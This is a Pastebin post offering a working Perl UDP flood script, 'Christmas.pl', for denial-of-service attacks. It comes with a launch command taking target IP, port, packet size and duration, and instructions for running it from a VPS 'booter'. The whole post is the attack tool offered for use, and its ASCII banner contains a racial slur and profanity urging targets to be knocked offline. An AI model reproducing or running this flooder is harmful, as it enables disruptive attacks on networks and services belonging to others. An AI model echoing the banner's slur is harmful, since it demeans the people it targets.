Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Decided to make up a quick DDoS script meant to be ran on a VPS for those who know how to set up VPS booters/Putty booters..
- -----------------------------------------------------------------------------------------------------------------------------
- A present to you peoples.
- ------------------------
- Screenie of it: http://prntscr.com/5jxryv
- -----------------------------------------
- The boot command: perl Christmas.pl 1.1.1.1 80 65500 6000
- -----------------------------------------
- Save it as "Christmas.pl" and upload it to your VPS and use the command above.
- -----------------------------------------
- #!/usr/bin/perl
- ##
- # Rated <---
- ##
- use Socket;
- use strict;
- my ($ip,$port,$size,$time) = @ARGV;
- my ($iaddr,$endtime,$psize,$pport);
- $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
- $endtime = time() + ($time ? $time : 100);
- socket(flood, PF_INET, SOCK_DGRAM, 17);
- print <<EOTEXT;
- _______
- | | |.-----..----..----..--.--.
- | || -__|| _|| _|| | |
- |__|_|__||_____||__| |__| |___ |
- _______ __ |_____|
- | ___|.--.--..----.| |--.|__|.-----..-----.
- | ___|| | || __|| < | || || _ |
- |______ ______||____|___|__||__|___|__||___ |
- | || |--..----.|__|.-----.| |_ .--------..---.-..-----.
- | ---|| || _|| ||__ --|| _|| || _ ||__ --|
- |______||__|__||__| |__||_____||____||__|__|__||___._||_____|
- Ho, Ho, Ho, Nigga Get Hit Offline - Have Some Presents
- Coded by:Rat3d
- EOTEXT
- print "Sending Presents: $ip " . ($port ? $port : "random") . "
- Getting Hit" .
- ($size ? "$size-GBS" : "Error..") . "
- ~Santa~ ~Get In My Fucking Sleigh~ " .
- ($time ? " for $time seconds" : "") . "\n";
- print "Break with Ctrl-C\n" unless $time;
- for (;time() <= $endtime;) {
- $psize = $size ? $size : int(rand(1500000-64)+64) ;
- $pport = $port ? $port : int(rand(1500000))+1;
- send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport,
- $iaddr));}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement